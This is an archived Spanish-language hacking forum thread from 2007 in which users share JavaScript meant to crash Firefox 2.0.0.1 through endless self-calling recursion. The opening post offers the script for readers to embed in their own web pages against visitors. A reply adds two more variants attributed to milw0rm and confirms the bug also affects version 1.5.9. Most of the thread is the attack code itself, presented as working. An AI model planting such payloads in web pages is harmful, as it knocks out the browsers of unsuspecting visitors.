Text only | Text with Images

HackPR.NET

Hacking y Seguridad => HacK General / Ethical Hacking => Topic started by: kazin on January 08, 2007, 01:23:22 AM

Title: Firefox 2.0.0.1 Denial Of Services
Post by: kazin on January 08, 2007, 01:23:22 AM
Utilize el buscador para ver si ya estaba esto... pero no encontro nada... asi que lo posteo:

Aparentemente con incluir este code en nuestra web podemos ocacionar DoS en firefox 2.0.0....

El code es el siguiente:

Code Select
<script>
function owned(){

setTimeout("owned()",1000);
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">

Probado... funciona correctamente...
Title: Re: Firefox 2.0.0.1 Denial Of Services
Post by: ElecBoy on January 08, 2007, 01:49:51 AM
Bueno pero estas seguro que en la version 2.0.0.1 funciona?
Title: Re: Firefox 2.0.0.1 Denial Of Services
Post by: kazin on January 08, 2007, 01:55:14 AM
Quote from: ElecBoy on January 08, 2007, 01:49:51 AM
Bueno pero estas seguro que en la version 2.0.0.1 funciona?

Boss estube investigando... aparentemente funciona correctamente... vi muchisimos comentarios afirmativos del exploit... tambien encontre esto:

Code Select
<script>
function loop(){
setTimeout("loop()",1000);
loop();
}
loop();
</script>

Code Select
<script>
function loop(){
setInterval("loop()",1000);
loop();
}
loop();
</script>


La fuente es milw0rm... asi que apuesto a que funciona...
Title: Re: Firefox 2.0.0.1 Denial Of Services
Post by: ElecBoy on January 21, 2007, 03:41:19 AM
EL tema ya tiene un tiempo de haber sido publicado pero si es Vulnerable con la version 2.0.0.1 de FireFox por ende tambien lo es con 1.5.9
Text only | Text with Images